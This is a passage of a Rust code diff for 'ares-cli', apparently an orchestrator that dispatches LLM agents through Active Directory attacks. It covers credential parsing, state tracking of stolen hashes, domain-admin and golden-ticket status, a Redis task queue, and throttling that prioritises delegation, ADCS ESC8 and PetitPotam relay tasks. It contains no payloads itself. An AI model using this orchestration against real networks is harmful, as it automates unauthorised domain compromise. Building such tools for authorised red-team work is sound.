+ // Strip trailing parenthetical metadata: "svc_test (Guest)" → "svc_test" + if TRAILING_PAREN_RE.is_match(&cred.password) { + cred.password = TRAILING_PAREN_RE.replace(&cred.password, "").to_string(); + } + + // Strip ellipsis truncation artifacts (matches Python add_credential) + while cred.password.ends_with("...") { + cred.password = cred.password[..cred.password.len() - 3].trim().to_string(); + } + while cred.password.ends_with('\u{2026}') { + cred.password.pop(); + cred.password = cred.password.trim().to_string(); + } + + // Normalize username with embedded @domain suffixes + // e.g. "sam.wilson@child.contoso.local@fabrikam.local" + // → username="sam.wilson", domain="child.contoso.local" + if cred.username.contains('@') { + let username_clone = cred.username.clone(); + let parts: Vec<&str> = username_clone.splitn(2, '@').collect(); + if parts.len() == 2 && !parts[0].is_empty() { + let base_username = parts[0].to_string(); + let domain_part = parts[1].split('@').next().unwrap_or(parts[1]).to_string(); + if domain_part.contains('.') { + cred.username = base_username; + cred.domain = domain_part; + } + } + } + + // Resolve NetBIOS domain to FQDN (e.g. "CHILD" → "child.contoso.local") + if !cred.domain.is_empty() && !cred.domain.contains('.') { + let domain_upper = cred.domain.to_uppercase(); + if let Some(fqdn) = netbios_to_fqdn.get(&domain_upper) { + // netbios_to_fqdn maps SHORTNAME → host.contoso.local + // Extract the domain suffix + let parts: Vec<&str> = fqdn.split('.').collect(); + if parts.len() >= 3 { + cred.domain = parts[1..].join("."); + } else { + cred.domain = fqdn.clone(); + } + } else { + // Try matching domain as prefix of any FQDN domain suffix + let domain_lower = cred.domain.to_lowercase(); + for fqdn in netbios_to_fqdn.values() { + let fqdn_parts: Vec<&str> = fqdn.split('.').collect(); + if fqdn_parts.len() >= 3 { + let domain_suffix = fqdn_parts[1..].join("."); + let first_label = fqdn_parts[1].to_lowercase(); + if first_label == domain_lower { + cred.domain = domain_suffix; + break; + } + } + } + } + } + + // Validate after sanitization + if !crate::orchestrator::output_extraction::is_valid_credential(&cred.username, &cred.password) + { + return None; + } + + Some(cred) +} + +/// Check if a hostname is an AWS internal PTR name. +pub(super) fn is_aws_hostname(hostname: &str) -> bool { + let lower = hostname.to_lowercase(); + lower.starts_with("ip-") && lower.contains("compute.internal") +} diff --git a/ares-cli/src/orchestrator/state/shared.rs b/ares-cli/src/orchestrator/state/shared.rs new file mode 100644 index 00000000..c74b10e3 --- /dev/null +++ b/ares-cli/src/orchestrator/state/shared.rs @@ -0,0 +1,234 @@ +//! SharedState — thread-safe wrapper around StateInner. + +use std::sync::Arc; +use tokio::sync::RwLock; + +use super::inner::StateInner; + +/// Thread-safe shared state with read/write access. +#[derive(Clone)] +pub struct SharedState { + pub(super) inner: Arc>, +} + +impl SharedState { + /// Create a new empty state. + pub fn new(operation_id: String) -> Self { + Self { + inner: Arc::new(RwLock::new(StateInner::new(operation_id))), + } + } + + /// Create a cheap snapshot of state for prompt generation. + /// + /// Clones the relevant fields so the RwLock is released before LLM calls. + pub async fn snapshot(&self) -> ares_llm::prompt::StateSnapshot { + let s = self.inner.read().await; + + // Compute undominated forests inline (avoids re-acquiring lock) + let undominated = crate::orchestrator::completion::compute_undominated_forests( + s.target.as_ref().map(|t| t.domain.as_str()), + s.domains.first().map(|d| d.as_str()), + &s.trusted_domains, + &s.dominated_domains, + ); + + ares_llm::prompt::StateSnapshot { + credentials: s.credentials.clone(), + hashes: s.hashes.clone(), + hosts: s.hosts.clone(), + shares: s.shares.clone(), + domains: s.domains.clone(), + discovered_vulnerabilities: s.discovered_vulnerabilities.clone(), + exploited_vulnerabilities: s.exploited_vulnerabilities.clone(), + domain_controllers: s.domain_controllers.clone(), + netbios_to_fqdn: s.netbios_to_fqdn.clone(), + has_domain_admin: s.has_domain_admin, + has_golden_ticket: s.has_golden_ticket, + undominated_forests: undominated, + delegation_accounts: s + .discovered_vulnerabilities + .values() + .filter(|v| { + let vt = v.vuln_type.to_lowercase(); + vt == "constrained_delegation" || vt == "rbcd" + }) + .filter_map(|v| { + v.details + .get("account_name") + .or_else(|| v.details.get("AccountName")) + .and_then(|x| x.as_str()) + .map(|s| s.to_lowercase()) + }) + .collect(), + } + } + + /// Read-only access to the state. + pub async fn read(&self) -> tokio::sync::RwLockReadGuard<'_, StateInner> { + self.inner.read().await + } + + /// Write access to the state. + pub async fn write(&self) -> tokio::sync::RwLockWriteGuard<'_, StateInner> { + self.inner.write().await + } + + /// Get the vuln queue ZSET key. + pub async fn vuln_queue_key(&self) -> String { + let state = self.inner.read().await; + format!( + "{}:{}:{}", + ares_core::state::KEY_PREFIX, + state.operation_id, + super::KEY_VULN_QUEUE + ) + } + + /// Get the discovery list key. + pub async fn discovery_key(&self) -> String { + let state = self.inner.read().await; + format!("{}:{}", super::DISCOVERY_KEY_PREFIX, state.operation_id) + } + + /// Get the operation ID. + pub async fn operation_id(&self) -> String { + self.inner.read().await.operation_id.clone() + } +} + +#[cfg(test)] +mod tests { + use super::*; + use ares_core::models::*; + use std::collections::HashMap; + + #[tokio::test] + async fn test_shared_state_new() { + let state = SharedState::new("op-test".into()); + assert_eq!(state.operation_id().await, "op-test"); + } + + #[tokio::test] + async fn test_snapshot_empty_state() { + let state = SharedState::new("op-1".into()); + let snap = state.snapshot().await; + assert!(snap.credentials.is_empty()); + assert!(snap.hashes.is_empty()); + assert!(snap.hosts.is_empty()); + assert!(snap.shares.is_empty()); + assert!(snap.domains.is_empty()); + assert!(snap.discovered_vulnerabilities.is_empty()); + assert!(snap.exploited_vulnerabilities.is_empty()); + assert!(snap.domain_controllers.is_empty()); + assert!(!snap.has_domain_admin); + assert!(!snap.has_golden_ticket); + } + + #[tokio::test] + async fn test_snapshot_reflects_state_mutations() { + let state = SharedState::new("op-1".into()); + + // Mutate state directly + { + let mut inner = state.write().await; + inner.credentials.push(Credential { + id: "c1".into(), + username: "admin".into(), + password: "pass".into(), + domain: "contoso.local".into(), + source: "test".into(), + discovered_at: None, + is_admin: true, + parent_id: None, + attack_step: 0, + }); + inner.domains.push("contoso.local".into()); + inner + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + inner.has_domain_admin = true; + } + + let snap = state.snapshot().await; + assert_eq!(snap.credentials.len(), 1); + assert_eq!(snap.credentials[0].username, "admin"); + assert_eq!(snap.domains, vec!["contoso.local"]); + assert_eq!( + snap.domain_controllers.get("contoso.local"), + Some(&"192.168.58.10".to_string()) + ); + assert!(snap.has_domain_admin); + } + + #[tokio::test] + async fn test_snapshot_is_independent_copy() { + let state = SharedState::new("op-1".into()); + { + let mut inner = state.write().await; + inner.domains.push("contoso.local".into()); + } + + let snap = state.snapshot().await; + assert_eq!(snap.domains.len(), 1); + + // Mutate state after snapshot + { + let mut inner = state.write().await; + inner.domains.push("fabrikam.local".into()); + } + + // Snapshot should still have only 1 domain + assert_eq!(snap.domains.len(), 1); + + // New snapshot should have 2 + let snap2 = state.snapshot().await; + assert_eq!(snap2.domains.len(), 2); + } + + #[tokio::test] + async fn test_vuln_queue_key() { + let state = SharedState::new("op-abc".into()); + let key = state.vuln_queue_key().await; + assert!(key.contains("op-abc")); + assert!(key.ends_with("vuln_queue")); + } + + #[tokio::test] + async fn test_discovery_key() { + let state = SharedState::new("op-xyz".into()); + let key = state.discovery_key().await; + assert!(key.contains("op-xyz")); + assert!(key.starts_with("ares:discoveries:")); + } + + #[tokio::test] + async fn test_snapshot_with_vulnerabilities() { + let state = SharedState::new("op-1".into()); + { + let mut inner = state.write().await; + let mut details = HashMap::new(); + details.insert("account".into(), serde_json::json!("svc_sql")); + inner.discovered_vulnerabilities.insert( + "vuln-001".into(), + VulnerabilityInfo { + vuln_id: "vuln-001".into(), + vuln_type: "constrained_delegation".into(), + target: "192.168.58.20".into(), + discovered_by: "recon".into(), + discovered_at: chrono::Utc::now(), + details, + recommended_agent: "privesc".into(), + priority: 3, + }, + ); + inner.exploited_vulnerabilities.insert("vuln-002".into()); + } + + let snap = state.snapshot().await; + assert_eq!(snap.discovered_vulnerabilities.len(), 1); + assert!(snap.discovered_vulnerabilities.contains_key("vuln-001")); + assert_eq!(snap.exploited_vulnerabilities.len(), 1); + assert!(snap.exploited_vulnerabilities.contains("vuln-002")); + } +} diff --git a/ares-cli/src/orchestrator/task_queue.rs b/ares-cli/src/orchestrator/task_queue.rs new file mode 100644 index 00000000..2385e9e3 --- /dev/null +++ b/ares-cli/src/orchestrator/task_queue.rs @@ -0,0 +1,488 @@ +//! Redis-backed task queue matching the Python `RedisTaskQueue`. +//! +//! Key patterns: +//! - `ares:tasks:{role}` — List, per-role task queue +//! - `ares:results:{task_id}` — List, per-task result mailbox (TTL 24h) +//! - `ares:heartbeat:{agent}` — String, agent heartbeat (TTL from config) +//! - `ares:task_status:{task_id}` — String, task lifecycle JSON +//! - `ares:lock:{op_id}` — String, operation lock with TTL refresh +//! +//! Workers BRPOP from the right; the orchestrator pushes to the left (LPUSH) +//! for normal priority and to the right (RPUSH) for urgent priority, giving +//! FIFO semantics with priority bypass. + +use std::collections::HashMap; +use std::time::Duration; + +use anyhow::{Context, Result}; +use chrono::{DateTime, Utc}; +use redis::aio::ConnectionManager; +use redis::AsyncCommands; +use serde::{Deserialize, Serialize}; +use tracing::{debug, info, warn}; +use uuid::Uuid; + +// --------------------------------------------------------------------------- +// Constants — must match the Python RedisTaskQueue class attributes exactly. +// --------------------------------------------------------------------------- + +pub const TASK_QUEUE_PREFIX: &str = "ares:tasks"; +pub const RESULT_QUEUE_PREFIX: &str = "ares:results"; +pub const HEARTBEAT_PREFIX: &str = "ares:heartbeat"; +pub const TASK_STATUS_PREFIX: &str = "ares:task_status"; +pub const LOCK_PREFIX: &str = "ares:lock"; +pub const STATE_UPDATE_CHANNEL_PREFIX: &str = "ares:state:updates"; + +/// Result keys expire after 24 hours. +const RESULT_TTL_SECS: u64 = 60 * 60 * 24; + +/// Task status keys expire after 24 hours. +const TASK_STATUS_TTL_SECS: u64 = 60 * 60 * 24; + +// --------------------------------------------------------------------------- +// Wire types — JSON-compatible with the Python TaskMessage / TaskResult. +// --------------------------------------------------------------------------- + +/// Task submitted to a role queue. Mirrors `ares.core.task_queue.TaskMessage`. +#[derive(Debug, Clone, Serialize, Deserialize)] +pub struct TaskMessage { + pub task_id: String, + pub task_type: String, + pub source_agent: String, + pub target_agent: String, + pub payload: serde_json::Value, + #[serde(default = "default_priority")] + pub priority: i32, + pub created_at: Option>, + pub callback_queue: Option, +} + +fn default_priority() -> i32 { + 5 +} + +/// Result returned by a worker. Mirrors `ares.core.task_queue.TaskResult`. +#[derive(Debug, Clone, Serialize, Deserialize)] +pub struct TaskResult { + pub task_id: String, + pub success: bool, + #[serde(default)] + pub result: Option, + #[serde(default)] + pub error: Option, + pub completed_at: Option>, + #[serde(default)] + pub worker_pod: Option, + #[serde(default)] + pub agent_name: Option, +} + +/// Heartbeat payload written by agents. +#[derive(Debug, Clone, Serialize, Deserialize)] +pub struct HeartbeatData { + pub agent: String, + pub status: String, + pub timestamp: String, + #[serde(default)] + pub current_task: Option, + #[serde(default)] + pub pod_name: Option, +} + +// --------------------------------------------------------------------------- +// TaskQueue — thin async wrapper around a redis ConnectionManager. +// --------------------------------------------------------------------------- + +/// Async Redis task queue implementing the Ares queue protocol. +#[derive(Clone)] +pub struct TaskQueue { + conn: ConnectionManager, +} + +#[allow(dead_code)] +impl TaskQueue { + /// Create a new queue from an existing connection manager. + pub fn new(conn: ConnectionManager) -> Self { + Self { conn } + } + + /// Connect to Redis and return a TaskQueue. + pub async fn connect(redis_url: &str) -> Result { + let client = redis::Client::open(redis_url) + .with_context(|| format!("Invalid Redis URL: {redis_url}"))?; + // Default response_timeout is 500ms which is too short for BRPOP + // blocking calls (tool results can take minutes). Without this fix, + // the client-side timeout cancels the future but the server-side + // BRPOP remains registered, consuming results that are silently lost. + let config = redis::aio::ConnectionManagerConfig::new() + .set_response_timeout(Some(Duration::from_secs(1800))); + let conn = client + .get_connection_manager_with_config(config) + .await + .with_context(|| format!("Failed to connect to Redis at {redis_url}"))?; + info!(url = %redis_url, "Connected to Redis"); + Ok(Self { conn }) + } + + // === Key helpers ======================================================== + + #[inline] + fn task_queue_key(role: &str) -> String { + format!("{TASK_QUEUE_PREFIX}:{role}") + } + + #[inline] + fn result_queue_key(task_id: &str) -> String { + format!("{RESULT_QUEUE_PREFIX}:{task_id}") + } + + #[inline] + fn heartbeat_key(agent: &str) -> String { + format!("{HEARTBEAT_PREFIX}:{agent}") + } + + #[inline] + fn task_status_key(task_id: &str) -> String { + format!("{TASK_STATUS_PREFIX}:{task_id}") + } + + // === Orchestrator methods =============================================== + + /// Submit a task to a role's queue. + /// + /// Priority <= 2 (urgent) uses RPUSH so the task is consumed first by + /// workers that BRPOP from the right. All other priorities use LPUSH for + /// FIFO order. + pub async fn submit_task( + &self, + task_type: &str, + target_role: &str, + payload: serde_json::Value, + source_agent: &str, + priority: i32, + ) -> Result { + let task_id = format!("{}_{}", task_type, &Uuid::new_v4().to_string()[..12]); + let callback = Self::result_queue_key(&task_id); + + let msg = TaskMessage { + task_id: task_id.clone(), + task_type: task_type.to_string(), + source_agent: source_agent.to_string(), + target_agent: target_role.to_string(), + payload, + priority, + created_at: Some(Utc::now()), + callback_queue: Some(callback), + }; + + let queue_key = Self::task_queue_key(target_role); + let json = serde_json::to_string(&msg).context("Failed to serialize TaskMessage")?; + + let mut conn = self.conn.clone(); + if priority <= 2 { + conn.rpush::<_, _, ()>(&queue_key, &json) + .await + .with_context(|| format!("RPUSH to {queue_key}"))?; + info!(task_id = %task_id, queue = %queue_key, priority, "Urgent task submitted (RPUSH)"); + } else { + conn.lpush::<_, _, ()>(&queue_key, &json) + .await + .with_context(|| format!("LPUSH to {queue_key}"))?; + info!(task_id = %task_id, queue = %queue_key, priority, "Task submitted (LPUSH)"); + } + + // Track status + self.set_task_status(&task_id, "pending").await?; + + Ok(task_id) + } + + /// Non-destructive peek: does a result exist for this task? + pub async fn has_pending_result(&self, task_id: &str) -> Result { + let key = Self::result_queue_key(task_id); + let mut conn = self.conn.clone(); + let len: i64 = conn.llen(&key).await.unwrap_or(0); + Ok(len > 0) + } + + /// Non-blocking check for a task result (RPOP). + pub async fn check_result(&self, task_id: &str) -> Result> { + let key = Self::result_queue_key(task_id); + let mut conn = self.conn.clone(); + let data: Option = conn.rpop(&key, None).await?; + match data { + Some(json) => { + let result: TaskResult = serde_json::from_str(&json) + .with_context(|| format!("Bad TaskResult JSON for {task_id}"))?; + Ok(Some(result)) + } + None => Ok(None), + } + } + + /// Batch-check results for multiple task IDs using a pipeline. + pub async fn check_results_batch( + &self, + task_ids: &[String], + ) -> Result>> { + if task_ids.is_empty() { + return Ok(HashMap::new()); + } + + let mut pipe = redis::pipe(); + for tid in task_ids { + let key = Self::result_queue_key(tid); + pipe.cmd("RPOP").arg(key); + } + + let mut conn = self.conn.clone(); + let raw: Vec> = pipe + .query_async(&mut conn) + .await + .context("Pipeline check_results_batch failed")?; + + let mut out = HashMap::with_capacity(task_ids.len()); + for (tid, data) in task_ids.iter().zip(raw) { + let parsed = match data { + Some(json) => match serde_json::from_str::(&json) { + Ok(r) => Some(r), + Err(e) => { + warn!(task_id = %tid, err = %e, "Ignoring malformed TaskResult"); + None + } + }, + None => None, + }; + out.insert(tid.clone(), parsed); + } + Ok(out) + } + + /// Blocking wait for a result (BRPOP). Timeout in seconds. + pub async fn poll_result( + &self, + task_id: &str, + timeout_secs: f64, + ) -> Result> { + let key = Self::result_queue_key(task_id); + let mut conn = self.conn.clone(); + let result: Option<(String, String)> = conn + .brpop(&key, timeout_secs) + .await + .with_context(|| format!("BRPOP on {key}"))?; + + match result { + Some((_key, json)) => { + let tr: TaskResult = serde_json::from_str(&json) + .with_context(|| format!("Bad TaskResult JSON for {task_id}"))?; + Ok(Some(tr)) + } + None => Ok(None), + } + } + + /// Get the length of a role's task queue. + pub async fn queue_length(&self, role: &str) -> Result { + let key = Self::task_queue_key(role); + let mut conn = self.conn.clone(); + let len: usize = conn.llen(&key).await?; + Ok(len) + } + + /// Read heartbeat data for an agent. + pub async fn get_heartbeat(&self, agent: &str) -> Result> { + let key = Self::heartbeat_key(agent); + let mut conn = self.conn.clone(); + let data: Option = conn.get(&key).await?; + match data { + Some(json) => { + let hb: HeartbeatData = serde_json::from_str(&json)?; + Ok(Some(hb)) + } + None => Ok(None), + } + } + + /// Write heartbeat for an agent (with TTL so stale entries self-expire). + pub async fn send_heartbeat( + &self, + agent: &str, + status: &str, + current_task: Option<&str>, + ttl: Duration, + ) -> Result<()> { + let key = Self::heartbeat_key(agent); + let hb = HeartbeatData { + agent: agent.to_string(), + status: status.to_string(), + timestamp: Utc::now().to_rfc3339(), + current_task: current_task.map(|s| s.to_string()), + pod_name: std::env::var("POD_NAME").ok(), + }; + let json = serde_json::to_string(&hb)?; + let mut conn = self.conn.clone(); + conn.set_ex::<_, _, ()>(&key, &json, ttl.as_secs()) + .await + .with_context(|| format!("SET EX heartbeat for {agent}"))?; + debug!(agent, status, "Heartbeat sent"); + Ok(()) + } + + /// Publish a state-update notification on the PubSub channel. + pub async fn publish_state_update(&self, operation_id: &str) -> Result<()> { + let channel = format!("{STATE_UPDATE_CHANNEL_PREFIX}:{operation_id}"); + let mut conn = self.conn.clone(); + conn.publish::<_, _, ()>(&channel, "updated") + .await + .with_context(|| format!("PUBLISH to {channel}"))?; + debug!(operation_id, "State update published"); + Ok(()) + } + + // === Operation lock ===================================================== + + /// Try to acquire the operation lock. Returns true if acquired. + pub async fn try_acquire_lock(&self, operation_id: &str, ttl: Duration) -> Result { + let key = format!("{LOCK_PREFIX}:{operation_id}"); + let holder = format!( + "orchestrator-{}", + std::env::var("POD_NAME").unwrap_or_else(|_| Uuid::new_v4().to_string()) + ); + let mut conn = self.conn.clone(); + let acquired: bool = redis::cmd("SET") + .arg(&key) + .arg(&holder) + .arg("NX") + .arg("EX") + .arg(ttl.as_secs()) + .query_async(&mut conn) + .await + .with_context(|| format!("SET NX lock for operation {operation_id}"))?; + if acquired { + info!(operation_id, "Operation lock acquired"); + } + Ok(acquired) + } + + /// Extend the operation lock TTL. Call periodically to keep it alive. + pub async fn extend_lock(&self, operation_id: &str, ttl: Duration) -> Result { + let key = format!("{LOCK_PREFIX}:{operation_id}"); + let mut conn = self.conn.clone(); + let ok: bool = conn.expire(&key, ttl.as_secs() as i64).await?; + if !ok { + warn!(operation_id, "Lock key missing — could not extend TTL"); + } + Ok(ok) + } + + // === Task status tracking =============================================== + + /// Set the status string for a task (with 24h TTL). + /// + /// If a record already exists for this task, preserves existing fields + /// (operation_id, role, task_type, started_at, payload) and updates + /// only the status and timestamps. + pub async fn set_task_status(&self, task_id: &str, status: &str) -> Result<()> { + let key = Self::task_status_key(task_id); + let mut conn = self.conn.clone(); + + // Read-modify-write: preserve existing fields + let existing: Option = match conn.get::<_, Option>(&key).await { + Ok(v) => v, + Err(e) => { + warn!(task_id = task_id, err = %e, "Failed to read existing task status"); + None + } + }; + let mut payload: serde_json::Value = existing + .and_then(|s| serde_json::from_str(&s).ok()) + .unwrap_or_else(|| serde_json::json!({})); + + let now = Utc::now().to_rfc3339(); + payload["task_id"] = serde_json::json!(task_id); + payload["status"] = serde_json::json!(status); + payload["updated_at"] = serde_json::json!(now); + + if status == "in_progress" && payload.get("started_at").is_none() { + payload["started_at"] = serde_json::json!(now); + } + if status == "completed" || status == "failed" { + payload["ended_at"] = serde_json::json!(now); + } + + let json = payload.to_string(); + conn.set_ex::<_, _, ()>(&key, &json, TASK_STATUS_TTL_SECS) + .await?; + Ok(()) + } + + /// Write a full task status record with all metadata. + pub async fn set_task_status_full( + &self, + task_id: &str, + status: &str, + operation_id: &str, + role: &str, + task_type: &str, + payload: Option<&serde_json::Value>, + ) -> Result<()> { + let key = Self::task_status_key(task_id); + let now = Utc::now().to_rfc3339(); + let mut record = serde_json::json!({ + "task_id": task_id, + "status": status, + "operation_id": operation_id, + "role": role, + "task_type": task_type, + "updated_at": now, + }); + if status == "in_progress" { + record["started_at"] = serde_json::json!(now); + } + if let Some(p) = payload { + record["payload"] = p.clone(); + } + let json = record.to_string(); + let mut conn = self.conn.clone(); + conn.set_ex::<_, _, ()>(&key, &json, TASK_STATUS_TTL_SECS) + .await?; + Ok(()) + } + + /// Read task status. + pub async fn get_task_status(&self, task_id: &str) -> Result> { + let key = Self::task_status_key(task_id); + let mut conn = self.conn.clone(); + let data: Option = conn.get(&key).await?; + Ok(data) + } + + /// Get a clone of the underlying connection manager. + /// + /// Used by the deferred queue to run ZSET commands directly. + pub fn connection(&self) -> ConnectionManager { + self.conn.clone() + } + + /// Send a result to the task's result queue (worker side). + pub async fn send_result(&self, task_id: &str, result: &TaskResult) -> Result<()> { + let key = Self::result_queue_key(task_id); + let json = serde_json::to_string(result)?; + let mut conn = self.conn.clone(); + conn.lpush::<_, _, ()>(&key, &json).await?; + conn.expire::<_, ()>(&key, RESULT_TTL_SECS as i64).await?; + let final_status = if result.success { + "completed" + } else { + "failed" + }; + debug!( + task_id = task_id, + status = final_status, + "Updating task status after send_result" + ); + self.set_task_status(task_id, final_status).await?; + debug!(task_id = task_id, "Task status updated to {}", final_status); + Ok(()) + } +} diff --git a/ares-cli/src/orchestrator/throttling.rs b/ares-cli/src/orchestrator/throttling.rs new file mode 100644 index 00000000..901a9834 --- /dev/null +++ b/ares-cli/src/orchestrator/throttling.rs @@ -0,0 +1,440 @@ +//! Rate limiting and concurrency control. +//! +//! Mirrors the Python `ares.core.dispatcher.throttling.ThrottlingMixin`. +//! +//! Three layers of throttling: +//! 1. **Per-role semaphores** — limits how many tasks one role can have in-flight. +//! 2. **Global LLM concurrency** — soft cap + 1.5x hard cap before deferring. +//! 3. **Dispatch delay** — minimum interval between consecutive submissions. + +use std::collections::HashMap; +use std::sync::Arc; +use std::time::Instant; + +use tokio::sync::Semaphore; +use tracing::{debug, info, warn}; + +use crate::orchestrator::config::OrchestratorConfig; +use crate::orchestrator::routing::ActiveTaskTracker; + +// --------------------------------------------------------------------------- +// Critical-path classification (matches Python ThrottlingMixin constants) +// --------------------------------------------------------------------------- + +/// Task types that bypass hard-cap throttling (DA-critical path). +const CRITICAL_PATH_TASK_TYPES: &[&str] = &["exploit"]; + +/// High-value exploit subtypes that bypass hard cap. +const CRITICAL_PATH_VULN_TYPES: &[&str] = &[ + "constrained_delegation", + "unconstrained_delegation", + "esc1", + "esc4", + "esc8", + "krbtgt_hash", + "adcs_esc1", + "adcs_esc4", + "adcs_esc8", +]; + +/// Maximum tasks allowed to bypass the hard cap simultaneously. +const MAX_BYPASS_TASKS: usize = 3; + +// --------------------------------------------------------------------------- +// ThrottleDecision +// --------------------------------------------------------------------------- + +/// What the throttler decided about a candidate task. +#[derive(Debug, Clone, PartialEq, Eq)] +pub enum ThrottleDecision { + /// Submit immediately. + Allow, + /// Defer to the deferred queue. + Defer, + /// Wait for `duration` then re-check. + Wait(std::time::Duration), +} + +// --------------------------------------------------------------------------- +// Throttler +// --------------------------------------------------------------------------- + +/// Concurrency controller that mirrors the Python throttling logic. +#[allow(dead_code)] +pub struct Throttler { + config: Arc, + tracker: ActiveTaskTracker, + /// Per-role semaphores (lazily populated). + role_semaphores: tokio::sync::Mutex>>, + /// Timestamp of the last successful dispatch. + last_dispatch: tokio::sync::Mutex, + /// Accumulated rate-limit errors (from worker feedback). + rate_limit_errors: tokio::sync::Mutex, + /// Global backoff deadline (if any). + backoff_until: tokio::sync::Mutex>, +} + +impl Throttler { + pub fn new(config: Arc, tracker: ActiveTaskTracker) -> Self { + Self { + config, + tracker, + role_semaphores: tokio::sync::Mutex::new(HashMap::new()), + last_dispatch: tokio::sync::Mutex::new(Instant::now()), + rate_limit_errors: tokio::sync::Mutex::new(0), + backoff_until: tokio::sync::Mutex::new(None), + } + } + + /// Evaluate whether `task_type` targeting `role` should be allowed now. + pub async fn check( + &self, + task_type: &str, + target_role: &str, + payload: Option<&serde_json::Value>, + ) -> ThrottleDecision { + // Non-LLM tasks (crack, command) always pass. + if crate::orchestrator::routing::is_non_llm_task(task_type) { + return ThrottleDecision::Allow; + } + + { + let backoff = self.backoff_until.lock().await; + if let Some(deadline) = *backoff { + if Instant::now() < deadline { + let remaining = deadline - Instant::now(); + return ThrottleDecision::Wait(remaining); + } + } + } + + let llm_count = self.tracker.llm_task_count().await; + let max_tasks = self.config.max_concurrent_tasks; + let hard_cap = self.config.hard_cap(); + + // --- HARD CAP (1.5x) --- + if llm_count >= hard_cap { + if self.is_critical_path(task_type, payload) { + let bypass_count = llm_count.saturating_sub(hard_cap); + if bypass_count >= MAX_BYPASS_TASKS { + warn!( + llm_count, + hard_cap, + bypass_count, + task_type, + "Hard cap: too many bypass tasks, deferring" + ); + return ThrottleDecision::Defer; + } + info!( + llm_count, + hard_cap, + bypass = bypass_count + 1, + task_type, + "Hard cap: allowing critical-path task" + ); + return ThrottleDecision::Allow; + } + + debug!(llm_count, hard_cap, task_type, "Hard cap: deferring task"); + return ThrottleDecision::Defer; + } + + // --- SOFT CAP --- + if llm_count >= max_tasks { + let role_count = self.tracker.count_for_role(target_role).await; + let min_per_role = 1_usize; // matches get_min_slots_per_role default + if role_count < min_per_role { + info!( + llm_count, + max_tasks, + role = target_role, + role_count, + "Soft cap: allowing — role below minimum" + ); + return ThrottleDecision::Allow; + } + debug!(llm_count, max_tasks, task_type, "Soft cap: deferring task"); + return ThrottleDecision::Defer; + } + + // --- Dispatch delay --- + { + let last = self.last_dispatch.lock().await; + let elapsed = last.elapsed(); + if elapsed < self.config.dispatch_delay { + let wait = self.config.dispatch_delay - elapsed; + return ThrottleDecision::Wait(wait); + } + } + + ThrottleDecision::Allow + } + + /// Record that a dispatch happened (updates the last-dispatch timestamp). + pub async fn record_dispatch(&self) { + let mut last = self.last_dispatch.lock().await; + *last = Instant::now(); + } + + /// Record a rate-limit error from a worker. If enough accumulate, trigger + /// a global backoff. + pub async fn record_rate_limit_error(&self) { + let mut errors = self.rate_limit_errors.lock().await; + *errors += 1; + let threshold = 3_u32; // matches Python get_rate_limit_threshold default + if *errors >= threshold { + let backoff_secs = 30_u64; // matches Python get_rate_limit_backoff default + let mut bo = self.backoff_until.lock().await; + *bo = Some(Instant::now() + std::time::Duration::from_secs(backoff_secs)); + warn!( + errors = *errors, + backoff_secs, "Rate limit threshold reached — applying global backoff" + ); + *errors = 0; + } + } + + /// Clear one rate-limit error (call on successful task completion). + pub async fn clear_rate_limit_error(&self) { + let mut errors = self.rate_limit_errors.lock().await; + *errors = errors.saturating_sub(1); + } + + /// Acquire a per-role semaphore permit. Returns a guard that releases on drop. + #[allow(dead_code)] + pub async fn acquire_role_permit( + &self, + role: &str, + ) -> Option { + let sem = { + let mut sems = self.role_semaphores.lock().await; + sems.entry(role.to_string()) + .or_insert_with(|| Arc::new(Semaphore::new(self.config.max_tasks_per_role))) + .clone() + }; + sem.try_acquire_owned().ok() + } + + // --- internal --- + + fn is_critical_path(&self, task_type: &str, payload: Option<&serde_json::Value>) -> bool { + // Check exploit + vuln_type + if CRITICAL_PATH_TASK_TYPES.contains(&task_type) { + if let Some(p) = payload { + let vt = p + .get("vuln_type") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_lowercase(); + if CRITICAL_PATH_VULN_TYPES.contains(&vt.as_str()) { + return true; + } + } + } + + // Check delegation enumeration + if task_type == "privesc_enumeration" { + if let Some(techniques) = payload + .and_then(|p| p.get("techniques")) + .and_then(|v| v.as_array()) + { + if techniques.iter().any(|t| { + t.as_str() + .map(|s| s.to_lowercase().contains("delegation")) + .unwrap_or(false) + }) { + return true; + } + } + } + + // Check ESC8 coercion + if task_type == "coercion" { + if let Some(techniques) = payload + .and_then(|p| p.get("techniques")) + .and_then(|v| v.as_array()) + { + let esc8_techniques = ["ntlmrelayx_to_adcs", "petitpotam"]; + if techniques.iter().any(|t| { + t.as_str() + .map(|s| esc8_techniques.contains(&s.to_lowercase().as_str())) + .unwrap_or(false) + }) { + return true; + } + } + } + + false + } +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::routing::{ActiveTask, ActiveTaskTracker}; + use serde_json::json; + + fn make_throttler(max_tasks: usize) -> (Throttler, ActiveTaskTracker) { + let config = Arc::new(crate::orchestrator::config::OrchestratorConfig { + redis_url: "redis://localhost".into(), + operation_id: "test-op".into(), + max_concurrent_tasks: max_tasks, + heartbeat_interval: std::time::Duration::from_secs(30), + heartbeat_timeout: std::time::Duration::from_secs(120), + result_poll_interval: std::time::Duration::from_millis(500), + lock_ttl: std::time::Duration::from_secs(300), + deferred_poll_interval: std::time::Duration::from_secs(10), + max_tasks_per_role: 3, + dispatch_delay: std::time::Duration::from_millis(0), + stale_task_timeout: std::time::Duration::from_secs(300), + deferred_task_max_age: std::time::Duration::from_secs(300), + max_deferred_per_type: 5, + max_deferred_total: 20, + target_domain: String::new(), + target_ips: Vec::new(), + initial_credential: None, + }); + let tracker = ActiveTaskTracker::new(); + (Throttler::new(config, tracker.clone()), tracker) + } + + #[tokio::test] + async fn non_llm_always_allowed() { + let (t, _) = make_throttler(1); + assert_eq!( + t.check("crack", "cracker", None).await, + ThrottleDecision::Allow + ); + assert_eq!( + t.check("command", "lateral", None).await, + ThrottleDecision::Allow + ); + } + + #[tokio::test] + async fn under_soft_cap_allows() { + let (t, _) = make_throttler(8); + assert_eq!( + t.check("recon", "recon", None).await, + ThrottleDecision::Allow + ); + } + + #[tokio::test] + async fn hard_cap_defers_non_critical() { + let (t, tracker) = make_throttler(2); // soft=2, hard=3 + for i in 0..3 { + tracker + .add(ActiveTask { + task_id: format!("t{i}"), + task_type: "recon".into(), + role: "recon".into(), + submitted_at: Instant::now(), + }) + .await; + } + assert_eq!( + t.check("recon", "recon", None).await, + ThrottleDecision::Defer + ); + } + + #[tokio::test] + async fn 